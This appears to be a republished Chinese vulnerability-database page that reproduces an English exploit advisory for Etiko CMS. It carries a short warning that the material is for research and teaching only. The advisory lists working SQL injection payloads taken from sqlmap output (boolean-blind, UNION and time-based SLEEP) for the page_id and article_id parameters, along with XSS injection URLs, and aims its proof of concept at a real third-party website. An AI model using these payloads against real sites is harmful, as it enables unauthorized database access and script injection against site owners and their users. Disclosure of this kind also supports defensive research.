链接:http://xforce.iss.net/xforce/xfdb/97030 *>测试方法:警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! # SQL Injection & XSS on Etiko CMS. # Risk: High # CWE number: CWE-89,CWE-79 # Date: 13/10/2014 # Vendor: www.etikweb.com # Version: All # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on: Windows 8 ; Chrome ; Sqlmap 1.0-dev-nongit-20140906 # Vulnerables Files: /index.php & /loja/index.php # Exploits: http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi] http://www.target.com/index.php?article_id=16 [SQLi] & [XSS]
# PoC: http://www.centrovegetariano.org/loja/index.php?page_id=19 http://www.centrovegetariano.org/index.php?article_id=16 --- "SQLI using SQLMAP."---
--- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=19" AND 3987=3987 AND "Tulh"="Tulh Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: page_id=-5362" UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: page_id=19" AND SLEEP(5) AND "mntS"="mntS --- --- Place: GET Parameter: article_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: article_id=16" AND 8044=8044 AND "yKZe"="yKZe Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: article_id=-2752" UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: article_id=16" AND SLEEP(5) AND "MDwY"="MDwY --- --- " XSS using HTML injection."--- http://www.centrovegetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee> http://www.centrovegetariano.org/index.php?article_id=16"><marquee>XSS</marquee> # Thank"s建议: 厂商补丁:Etiko ----- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.etikweb.com/
易网时代-编程资源站